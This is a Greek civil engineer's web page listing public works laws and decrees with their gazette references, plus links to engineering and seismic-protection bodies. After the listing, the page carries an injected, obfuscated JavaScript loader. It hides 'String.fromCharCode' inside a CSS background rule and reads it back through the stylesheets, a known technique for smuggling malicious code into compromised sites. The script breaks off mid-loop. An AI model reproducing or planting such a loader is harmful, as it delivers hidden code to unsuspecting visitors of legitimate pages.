Νομοθεσία    Δημοσίων   Έργων.

 

 

Π.Παπαδιώτης            

Πολιτικός Μηχανικός   Α.Π.Θ

ΒΟΛΟΣ                         

 

ΒΑΣΙΚΗ ΝΟΜΟΘΕΣΙΑ.

 

  Συνοπτικός Πίνακας.

  

Η Νομοθεσία των Δημοσίων Έργων σε πλήρες κείμενο, με ενσωματωμένες 

όλες τις μέχρι σήμερα τροποποιήσεις.

N.1418/84         ΦΕΚ Α/ 23/29-02-1984.     

Όπως τροποποιήθηκε με τον Ν.3481/06 (ΦΕΚ 162/2-8-06) για το Κτηματολόγιο.

 

ΠΔ.609/85        ΦΕΚ  Α/223/31-12-1985.

                                 *Στείλτε mail για τους κωδικούς

N.3263/04         (ΦΕΚ-179/Α/28-9-04) [ΙΣΧΥΕΙ 28-9-04].

 

 

ΜΕΛΕΤΕΣ ΔΗΜΟΣΙΩΝ  ΕΡΓΩΝ

 Ν-3316/05             (ΦΕΚ-42/Α/22-2-05)   
Ανάθεση και εκτέλεση δημοσίων συμβάσεων εκπόνησης μελετών και παροχής συναφών υπηρεσιών και άλλες διατάξεις

 

 

N.2672/98        Διακίνηση εγγράφων με ηλεκτρονικά μέσα (τηλεομοιοτυπία -

                               ηλεκτρονικό   ταχυδρομείο)

 

 

 

ΒΑΣΙΚΕΣ ΔΙΟΙΚΗΤΙΚΕΣ ΠΡΑΞΕΙΣ ΣΤΙΣ ΚΑΤΑΣΚΕΥΕΣ

 

 

ΠΑΡΑΠΟΜΠΕΣ ΣΕ ΔΙΚΤΥΑΚΟΥΣ ΤΟΠΟΥΣ ΤΡΙΤΩΝ.

 

Τ.Ε.Ε. ΤΕΧΝΙΚΟ ΕΠΙΜΕΛΗΤΗΡΙΟ ΕΛΛΑΔΟΣ                                                                

ΣΥΛΛΟΓΟΣ ΠΟΛΙΤΙΚΩΝ ΜΗΧΑΝΙΚΩΝ ΕΛΛΑΔΟΣ

Ο.Α.Σ.Π. ΟΡΓΑΝΙΣΜΟΣ ΑΝΤΙΣΕΙΣΜΙΚΟΥ ΣΧΕΔΙΑΣΜΟΥ & ΠΡΟΣΤΑΣΙΑΣ

Ι.Τ.Σ.Α.Κ. ΙΝΣΤΙΤ. ΤΕΧΝ. ΣΕΙΣΜ/ΓΙΑΣ & ΑΝΤΙΣΕΙΣΜΙΚΩΝ ΚΑΤΑΣΚΕΥΩΝ

Ι.Ο.Κ. ΙΝΣΤΙΤΟΥΤΟ ΟΙΚΟΝΟΜΙΑΣ ΚΑΤΑΣΚΕΥΩΝ

ΓΕΝΙΚΗ ΓΡΑΜΜΑΤΕΙΑ ΔΗΜΟΣΙΩΝ ΕΡΓΩΝ (ΥΠΕΧΩΔΕ)

 

Τιμολόγια - Διακηρύξεις - Εγκύκλιοι.

function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#va','background:url(data:,String.fromCharCode)');var uu=null;var r=document.styleSheets;for(var i=0;i